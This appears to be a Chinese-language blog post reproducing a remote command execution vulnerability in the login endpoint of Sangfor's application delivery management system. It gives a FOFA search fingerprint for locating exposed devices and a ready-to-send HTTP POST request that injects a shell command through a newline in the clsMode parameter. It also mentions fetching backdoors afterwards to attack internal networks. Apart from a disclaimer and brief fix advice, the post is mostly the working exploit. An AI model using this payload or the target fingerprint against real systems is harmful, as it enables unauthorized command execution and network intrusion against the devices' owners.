前言
此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!
一、产品简介
深信服应用交付报表系统是深信服最新推出的应用交付系列设备,其突出特色就是SINFOR AD的智能分析功能。该系统能够为用户提供包括多数据中心负载均衡、多链路负载均衡、服务器负载均衡的全方位解决方案。不仅实现对各个数据中心、链路以及服务器状态的实时监控,同时根据预设规则,将用户的访问请求分配给相应的数据中心、链路以及服务 。
二、漏洞描述
深信服应用交付管理系统login存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令
三、影响范围
深信服 应用交付管理系统 7.0.8-7.0.8R5
四、复现环境
FOFA:fid=“iaytNA57019/kADk8Nev7g==”
五、漏洞复现
1.访问存在漏洞的网站,抓包
2.POC
POST /rep/login HTTP/1.1
Host: ip-port
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length:124
clsMode=cls_mode_login%0Aifconfig%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
3.成功
六、漏洞利用
后续可远程下载后门文件,进一步攻击内网
七、修复建议
将此系统放进内网,等待厂家修复
https://www.sangfor.com.cn/product-and-solution/sangfor-cloud/ad
参考链接
https://blog.csdn.net/nnn2188185/article/details/133365748
1111
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
